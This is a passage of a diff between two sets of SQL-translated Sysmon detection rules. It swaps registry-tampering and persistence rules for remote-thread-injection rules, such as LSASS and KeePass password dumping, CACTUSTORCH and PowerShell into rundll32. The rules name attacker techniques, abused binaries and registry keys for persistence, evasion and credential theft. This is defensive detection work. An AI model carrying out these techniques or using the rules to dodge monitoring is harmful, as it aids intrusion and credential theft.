WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "Session Manager Autorun Keys Modification", - "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", + "status": "experimental", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", - "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "status": "experimental", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.execution", + 
"attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_globalflags.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Potential Persistence Via Shim Database Modification", - "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", - "status": "experimental", - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", - "author": "frack113", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "status": "test", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1546.011" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (Details = ''))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_persistence_shim_databases.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "Disable Exploit Guard Network Protection on Windows Defender", - "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", - "status": "experimental", - "description": "Detects disabling Windows Defender Exploit Guard Network Protection", - "author": "Austin Songer @austinsonger", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "status": "test", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND Details = 'DWORD (00000001)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE 
'%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Persistence Via Disk Cleanup Handler - Autorun", - "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND 
TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (Details LIKE '%cmd%' ESCAPE '\\' OR Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%wsl%' ESCAPE '\\' OR Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range 
of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 
'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", - "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. 
A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "Windows Defender Exclusions Added - Registry", - "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "status": "test", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], + "title": "Suspicious Remote Thread Target", + "id": "f016c716-754a-467f-a39e-63c06f773987", + "status": "experimental", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrator actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" ], - "filename": "registry_set_defender_exclusions.yml" + "filename": "create_remote_thread_win_susp_remote_thread_target.yml" }, { - "title": "CurrentControlSet Autorun Keys Modification", - "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Remote Thread Creation Via PowerShell", + "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "status": "test", + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal 
Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR Details LIKE 'CutePDF Writer' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND Details = 'VNCpm.dll')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" + "filename": "create_remote_thread_win_powershell_crt.yml" }, { - "title": "Persistence Via New SIP Provider", - "id": 
"5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", - "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", + "id": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "status": "test", + "description": "Detects raw disk access using uncommon tools, which could indicate possible defense evasion attempts", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1553.003" + "attack.t1006" ], "falsepositives": [ - "Legitimate SIP being registered by the OS or different software." + "Legitimate Administrator using tool for raw access or ongoing forensic investigation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((Details IN ('WINTRUST.DLL', 'mso.dll')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '9' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Device LIKE '%floppy%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 
'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SystemApps\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\servicing\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\uus\\\\%' ESCAPE '\\')) OR (ProcessId = '4') OR ((Image LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image IN ('System', 'Registry')) OR (Image LIKE '%\\\\Keybase\\\\upd.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\thor.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SystemApps\\\\Microsoft.Windows.StartMenuExperienceHost%' ESCAPE '\\' AND Image LIKE '%\\\\StartMenuExperienceHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download%' ESCAPE '\\' AND Image LIKE '%\\\\WindowsUpdateBox.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND Image LIKE '%\\\\resources\\\\app\\\\git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\') 